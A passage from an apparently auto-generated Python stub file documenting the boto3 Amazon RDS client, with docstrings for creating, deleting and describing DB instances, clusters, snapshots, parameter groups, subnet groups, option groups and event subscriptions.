:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'DBParameterGroup': {
'DBParameterGroupName': 'string',
'DBParameterGroupFamily': 'string',
'Description': 'string',
'DBParameterGroupArn': 'string'
}
}
"""
pass
def create_db_security_group(DBSecurityGroupName=None, DBSecurityGroupDescription=None, Tags=None):
"""
Creates a new DB security group. DB security groups control access to a DB instance.
See also: AWS API Documentation
Examples
This example creates a DB security group.
Expected Output:
:example: response = client.create_db_security_group(
DBSecurityGroupName='string',
DBSecurityGroupDescription='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DBSecurityGroupName: string
:param DBSecurityGroupName: [REQUIRED]
The name for the DB security group. This value is stored as a lowercase string.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Must not be 'Default'
Example: mysecuritygroup
:type DBSecurityGroupDescription: string
:param DBSecurityGroupDescription: [REQUIRED]
The description for the DB security group.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'DBSecurityGroup': {
'OwnerId': 'string',
'DBSecurityGroupName': 'string',
'DBSecurityGroupDescription': 'string',
'VpcId': 'string',
'EC2SecurityGroups': [
{
'Status': 'string',
'EC2SecurityGroupName': 'string',
'EC2SecurityGroupId': 'string',
'EC2SecurityGroupOwnerId': 'string'
},
],
'IPRanges': [
{
'Status': 'string',
'CIDRIP': 'string'
},
],
'DBSecurityGroupArn': 'string'
}
}
:returns:
DescribeDBSecurityGroups
AuthorizeDBSecurityGroupIngress
CreateDBSecurityGroup
RevokeDBSecurityGroupIngress
"""
pass
def create_db_snapshot(DBSnapshotIdentifier=None, DBInstanceIdentifier=None, Tags=None):
"""
Creates a DBSnapshot. The source DBInstance must be in "available" state.
See also: AWS API Documentation
Examples
This example creates a DB snapshot.
Expected Output:
:example: response = client.create_db_snapshot(
DBSnapshotIdentifier='string',
DBInstanceIdentifier='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: [REQUIRED]
The identifier for the DB snapshot.
Constraints:
Cannot be null, empty, or blank
Must contain from 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-snapshot-id
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The DB instance identifier. This is the unique key that identifies a DB instance.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'DBSnapshot': {
'DBSnapshotIdentifier': 'string',
'DBInstanceIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'AvailabilityZone': 'string',
'VpcId': 'string',
'InstanceCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'Iops': 123,
'OptionGroupName': 'string',
'PercentProgress': 123,
'SourceRegion': 'string',
'SourceDBSnapshotIdentifier': 'string',
'StorageType': 'string',
'TdeCredentialArn': 'string',
'Encrypted': True|False,
'KmsKeyId': 'string',
'DBSnapshotArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBSnapshot
DeleteDBSnapshot
"""
pass
def create_db_subnet_group(DBSubnetGroupName=None, DBSubnetGroupDescription=None, SubnetIds=None, Tags=None):
"""
Creates a new DB subnet group. DB subnet groups must contain at least one subnet in at least two AZs in the region.
See also: AWS API Documentation
Examples
This example creates a DB subnet group.
Expected Output:
:example: response = client.create_db_subnet_group(
DBSubnetGroupName='string',
DBSubnetGroupDescription='string',
SubnetIds=[
'string',
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DBSubnetGroupName: string
:param DBSubnetGroupName: [REQUIRED]
The name for the DB subnet group. This value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type DBSubnetGroupDescription: string
:param DBSubnetGroupDescription: [REQUIRED]
The description for the DB subnet group.
:type SubnetIds: list
:param SubnetIds: [REQUIRED]
The EC2 Subnet IDs for the DB subnet group.
(string) --
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
}
}
:returns:
CreateDBSubnetGroup
ModifyDBSubnetGroup
DescribeDBSubnetGroups
DeleteDBSubnetGroup
"""
pass
def create_event_subscription(SubscriptionName=None, SnsTopicArn=None, SourceType=None, EventCategories=None, SourceIds=None, Enabled=None, Tags=None):
"""
Creates an RDS event notification subscription. This action requires a topic ARN (Amazon Resource Name) created by either the RDS console, the SNS console, or the SNS API. To obtain an ARN with SNS, you must create a topic in Amazon SNS and subscribe to the topic. The ARN is displayed in the SNS console.
You can specify the type of source (SourceType) you want to be notified of, provide a list of RDS sources (SourceIds) that triggers the events, and provide a list of event categories (EventCategories) for events you want to be notified of. For example, you can specify SourceType = db-instance, SourceIds = mydbinstance1, mydbinstance2 and EventCategories = Availability, Backup.
If you specify both the SourceType and SourceIds, such as SourceType = db-instance and SourceIdentifier = myDBInstance1, you will be notified of all the db-instance events for the specified source. If you specify a SourceType but do not specify a SourceIdentifier, you will receive notice of the events for that source type for all your RDS sources. If you do not specify either the SourceType nor the SourceIdentifier, you will be notified of events generated from all RDS sources belonging to your customer account.
See also: AWS API Documentation
Examples
This example creates an event notification subscription.
Expected Output:
:example: response = client.create_event_subscription(
SubscriptionName='string',
SnsTopicArn='string',
SourceType='string',
EventCategories=[
'string',
],
SourceIds=[
'string',
],
Enabled=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type SubscriptionName: string
:param SubscriptionName: [REQUIRED]
The name of the subscription.
Constraints: The name must be less than 255 characters.
:type SnsTopicArn: string
:param SnsTopicArn: [REQUIRED]
The Amazon Resource Name (ARN) of the SNS topic created for event notification. The ARN is created by Amazon SNS when you create a topic and subscribe to it.
:type SourceType: string
:param SourceType: The type of source that will be generating the events. For example, if you want to be notified of events generated by a DB instance, you would set this parameter to db-instance. if this value is not specified, all events are returned.
Valid values: db-instance | db-cluster | db-parameter-group | db-security-group | db-snapshot | db-cluster-snapshot
:type EventCategories: list
:param EventCategories: A list of event categories for a SourceType that you want to subscribe to. You can see a list of the categories for a given SourceType in the Events topic in the Amazon RDS User Guide or by using the DescribeEventCategories action.
(string) --
:type SourceIds: list
:param SourceIds: The list of identifiers of the event sources for which events will be returned. If not specified, then all sources are included in the response. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens; it cannot end with a hyphen or contain two consecutive hyphens.
Constraints:
If SourceIds are supplied, SourceType must also be provided.
If the source type is a DB instance, then a DBInstanceIdentifier must be supplied.
If the source type is a DB security group, a DBSecurityGroupName must be supplied.
If the source type is a DB parameter group, a DBParameterGroupName must be supplied.
If the source type is a DB snapshot, a DBSnapshotIdentifier must be supplied.
(string) --
:type Enabled: boolean
:param Enabled: A Boolean value; set to true to activate the subscription, set to false to create the subscription but not active it.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False,
'EventSubscriptionArn': 'string'
}
}
:returns:
(string) --
"""
pass
def create_option_group(OptionGroupName=None, EngineName=None, MajorEngineVersion=None, OptionGroupDescription=None, Tags=None):
"""
Creates a new option group. You can create up to 20 option groups.
See also: AWS API Documentation
Examples
This example creates an option group.
Expected Output:
:example: response = client.create_option_group(
OptionGroupName='string',
EngineName='string',
MajorEngineVersion='string',
OptionGroupDescription='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type OptionGroupName: string
:param OptionGroupName: [REQUIRED]
Specifies the name of the option group to be created.
Constraints:
Must be 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: myoptiongroup
:type EngineName: string
:param EngineName: [REQUIRED]
Specifies the name of the engine that this option group should be associated with.
:type MajorEngineVersion: string
:param MajorEngineVersion: [REQUIRED]
Specifies the major version of the engine that this option group should be associated with.
:type OptionGroupDescription: string
:param OptionGroupDescription: [REQUIRED]
The description of the option group.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'OptionGroup': {
'OptionGroupName': 'string',
'OptionGroupDescription': 'string',
'EngineName': 'string',
'MajorEngineVersion': 'string',
'Options': [
{
'OptionName': 'string',
'OptionDescription': 'string',
'Persistent': True|False,
'Permanent': True|False,
'Port': 123,
'OptionVersion': 'string',
'OptionSettings': [
{
'Name': 'string',
'Value': 'string',
'DefaultValue': 'string',
'Description': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'IsCollection': True|False
},
],
'DBSecurityGroupMemberships': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroupMemberships': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
]
},
],
'AllowsVpcAndNonVpcInstanceMemberships': True|False,
'VpcId': 'string',
'OptionGroupArn': 'string'
}
}
:returns:
ModifyDBInstance
RebootDBInstance
RestoreDBInstanceFromDBSnapshot
RestoreDBInstanceToPointInTime
"""
pass
def delete_db_cluster(DBClusterIdentifier=None, SkipFinalSnapshot=None, FinalDBSnapshotIdentifier=None):
"""
The DeleteDBCluster action deletes a previously provisioned DB cluster. When you delete a DB cluster, all automated backups for that DB cluster are deleted and cannot be recovered. Manual DB cluster snapshots of the specified DB cluster are not deleted.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example deletes the specified DB cluster.
Expected Output:
:example: response = client.delete_db_cluster(
DBClusterIdentifier='string',
SkipFinalSnapshot=True|False,
FinalDBSnapshotIdentifier='string'
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The DB cluster identifier for the DB cluster to be deleted. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type SkipFinalSnapshot: boolean
:param SkipFinalSnapshot: Determines whether a final DB cluster snapshot is created before the DB cluster is deleted. If true is specified, no DB cluster snapshot is created. If false is specified, a DB cluster snapshot is created before the DB cluster is deleted.
Note
You must specify a FinalDBSnapshotIdentifier parameter if SkipFinalSnapshot is false .
Default: false
:type FinalDBSnapshotIdentifier: string
:param FinalDBSnapshotIdentifier: The DB cluster snapshot identifier of the new DB cluster snapshot created when SkipFinalSnapshot is set to false .
Note
Specifying this parameter and also setting the SkipFinalShapshot parameter to true results in an error.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:rtype: dict
:return: {
'DBCluster': {
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
}
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def delete_db_cluster_parameter_group(DBClusterParameterGroupName=None):
"""
Deletes a specified DB cluster parameter group. The DB cluster parameter group to be deleted cannot be associated with any DB clusters.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example deletes the specified DB cluster parameter group.
Expected Output:
:example: response = client.delete_db_cluster_parameter_group(
DBClusterParameterGroupName='string'
)
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: [REQUIRED]
The name of the DB cluster parameter group.
Constraints:
Must be the name of an existing DB cluster parameter group.
You cannot delete a default DB cluster parameter group.
Cannot be associated with any DB clusters.
:return: response = client.delete_db_cluster_parameter_group(
DBClusterParameterGroupName='mydbclusterparametergroup',
)
print(response)
"""
pass
def delete_db_cluster_snapshot(DBClusterSnapshotIdentifier=None):
"""
Deletes a DB cluster snapshot. If the snapshot is being copied, the copy operation is terminated.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example deletes the specified DB cluster snapshot.
Expected Output:
:example: response = client.delete_db_cluster_snapshot(
DBClusterSnapshotIdentifier='string'
)
:type DBClusterSnapshotIdentifier: string
:param DBClusterSnapshotIdentifier: [REQUIRED]
The identifier of the DB cluster snapshot to delete.
Constraints: Must be the name of an existing DB cluster snapshot in the available state.
:rtype: dict
:return: {
'DBClusterSnapshot': {
'AvailabilityZones': [
'string',
],
'DBClusterSnapshotIdentifier': 'string',
'DBClusterIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'VpcId': 'string',
'ClusterCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'PercentProgress': 123,
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DBClusterSnapshotArn': 'string',
'SourceDBClusterSnapshotArn': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
(string) --
"""
pass
def delete_db_instance(DBInstanceIdentifier=None, SkipFinalSnapshot=None, FinalDBSnapshotIdentifier=None):
"""
The DeleteDBInstance action deletes a previously provisioned DB instance. When you delete a DB instance, all automated backups for that instance are deleted and cannot be recovered. Manual DB snapshots of the DB instance to be deleted by DeleteDBInstance are not deleted.
If you request a final DB snapshot the status of the Amazon RDS DB instance is deleting until the DB snapshot is created. The API action DescribeDBInstance is used to monitor the status of this operation. The action cannot be canceled or reverted once submitted.
Note that when a DB instance is in a failure state and has a status of failed , incompatible-restore , or incompatible-network , you can only delete it when the SkipFinalSnapshot parameter is set to true .
If the specified DB instance is part of an Amazon Aurora DB cluster, you cannot delete the DB instance if the following are true:
To delete a DB instance in this case, first call the PromoteReadReplicaDBCluster API action to promote the DB cluster so it's no longer a Read Replica. After the promotion completes, then call the DeleteDBInstance API action to delete the final instance in the DB cluster.
See also: AWS API Documentation
Examples
This example deletes the specified DB instance.
Expected Output:
:example: response = client.delete_db_instance(
DBInstanceIdentifier='string',
SkipFinalSnapshot=True|False,
FinalDBSnapshotIdentifier='string'
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The DB instance identifier for the DB instance to be deleted. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type SkipFinalSnapshot: boolean
:param SkipFinalSnapshot: Determines whether a final DB snapshot is created before the DB instance is deleted. If true is specified, no DBSnapshot is created. If false is specified, a DB snapshot is created before the DB instance is deleted.
Note that when a DB instance is in a failure state and has a status of 'failed', 'incompatible-restore', or 'incompatible-network', it can only be deleted when the SkipFinalSnapshot parameter is set to 'true'.
Specify true when deleting a Read Replica.
Note
The FinalDBSnapshotIdentifier parameter must be specified if SkipFinalSnapshot is false .
Default: false
:type FinalDBSnapshotIdentifier: string
:param FinalDBSnapshotIdentifier: The DBSnapshotIdentifier of the new DBSnapshot created when SkipFinalSnapshot is set to false .
Note
Specifying this parameter and also setting the SkipFinalShapshot parameter to true results in an error.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Cannot be specified when deleting a Read Replica.
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
DBInstanceIdentifier (string) -- [REQUIRED]
The DB instance identifier for the DB instance to be deleted. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
SkipFinalSnapshot (boolean) -- Determines whether a final DB snapshot is created before the DB instance is deleted. If true is specified, no DBSnapshot is created. If false is specified, a DB snapshot is created before the DB instance is deleted.
Note that when a DB instance is in a failure state and has a status of 'failed', 'incompatible-restore', or 'incompatible-network', it can only be deleted when the SkipFinalSnapshot parameter is set to "true".
Specify true when deleting a Read Replica.
Note
The FinalDBSnapshotIdentifier parameter must be specified if SkipFinalSnapshot is false .
Default: false
FinalDBSnapshotIdentifier (string) -- The DBSnapshotIdentifier of the new DBSnapshot created when SkipFinalSnapshot is set to false .
Note
Specifying this parameter and also setting the SkipFinalShapshot parameter to true results in an error.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Cannot be specified when deleting a Read Replica.
"""
pass
def delete_db_parameter_group(DBParameterGroupName=None):
"""
Deletes a specified DBParameterGroup. The DBParameterGroup to be deleted cannot be associated with any DB instances.
See also: AWS API Documentation
Examples
The following example deletes a DB parameter group.
Expected Output:
:example: response = client.delete_db_parameter_group(
DBParameterGroupName='string'
)
:type DBParameterGroupName: string
:param DBParameterGroupName: [REQUIRED]
The name of the DB parameter group.
Constraints:
Must be the name of an existing DB parameter group
You cannot delete a default DB parameter group
Cannot be associated with any DB instances
:return: response = client.delete_db_parameter_group(
DBParameterGroupName='mydbparamgroup3',
)
print(response)
"""
pass
def delete_db_security_group(DBSecurityGroupName=None):
"""
Deletes a DB security group.
See also: AWS API Documentation
Examples
The following example deletes a DB security group.
Expected Output:
:example: response = client.delete_db_security_group(
DBSecurityGroupName='string'
)
:type DBSecurityGroupName: string
:param DBSecurityGroupName: [REQUIRED]
The name of the DB security group to delete.
Note
You cannot delete the default DB security group.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Must not be 'Default'
:return: response = client.delete_db_security_group(
DBSecurityGroupName='mysecgroup',
)
print(response)
"""
pass
def delete_db_snapshot(DBSnapshotIdentifier=None):
"""
Deletes a DBSnapshot. If the snapshot is being copied, the copy operation is terminated.
See also: AWS API Documentation
Examples
This example deletes the specified DB snapshot.
Expected Output:
:example: response = client.delete_db_snapshot(
DBSnapshotIdentifier='string'
)
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: [REQUIRED]
The DBSnapshot identifier.
Constraints: Must be the name of an existing DB snapshot in the available state.
:rtype: dict
:return: {
'DBSnapshot': {
'DBSnapshotIdentifier': 'string',
'DBInstanceIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'AvailabilityZone': 'string',
'VpcId': 'string',
'InstanceCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'Iops': 123,
'OptionGroupName': 'string',
'PercentProgress': 123,
'SourceRegion': 'string',
'SourceDBSnapshotIdentifier': 'string',
'StorageType': 'string',
'TdeCredentialArn': 'string',
'Encrypted': True|False,
'KmsKeyId': 'string',
'DBSnapshotArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
"""
pass
def delete_db_subnet_group(DBSubnetGroupName=None):
"""
Deletes a DB subnet group.
See also: AWS API Documentation
Examples
This example deletes the specified DB subnetgroup.
Expected Output:
:example: response = client.delete_db_subnet_group(
DBSubnetGroupName='string'
)
:type DBSubnetGroupName: string
:param DBSubnetGroupName: [REQUIRED]
The name of the database subnet group to delete.
Note
You cannot delete the default subnet group.
Constraints:
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:return: response = client.delete_db_subnet_group(
DBSubnetGroupName='mydbsubnetgroup',
)
print(response)
"""
pass
def delete_event_subscription(SubscriptionName=None):
"""
Deletes an RDS event notification subscription.
See also: AWS API Documentation
Examples
This example deletes the specified DB event subscription.
Expected Output:
:example: response = client.delete_event_subscription(
SubscriptionName='string'
)
:type SubscriptionName: string
:param SubscriptionName: [REQUIRED]
The name of the RDS event notification subscription you want to delete.
:rtype: dict
:return: {
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False,
'EventSubscriptionArn': 'string'
}
}
:returns:
(string) --
"""
pass
def delete_option_group(OptionGroupName=None):
"""
Deletes an existing option group.
See also: AWS API Documentation
Examples
This example deletes the specified option group.
Expected Output:
:example: response = client.delete_option_group(
OptionGroupName='string'
)
:type OptionGroupName: string
:param OptionGroupName: [REQUIRED]
The name of the option group to be deleted.
Note
You cannot delete default option groups.
:return: response = client.delete_option_group(
OptionGroupName='mydboptiongroup',
)
print(response)
"""
pass
def describe_account_attributes():
"""
Lists all of the attributes for a customer account. The attributes include Amazon RDS quotas for the account, such as the number of DB instances allowed. The description for a quota includes the quota name, current usage toward that quota, and the quota's maximum value.
This command does not take any parameters.
See also: AWS API Documentation
Examples
This example lists account attributes.
Expected Output:
:example: response = client.describe_account_attributes()
:rtype: dict
:return: {
'AccountQuotas': [
{
'AccountQuotaName': 'string',
'Used': 123,
'Max': 123
},
]
}
"""
pass
def describe_certificates(CertificateIdentifier=None, Filters=None, MaxRecords=None, Marker=None):
"""
Lists the set of CA certificates provided by Amazon RDS for this AWS account.
See also: AWS API Documentation
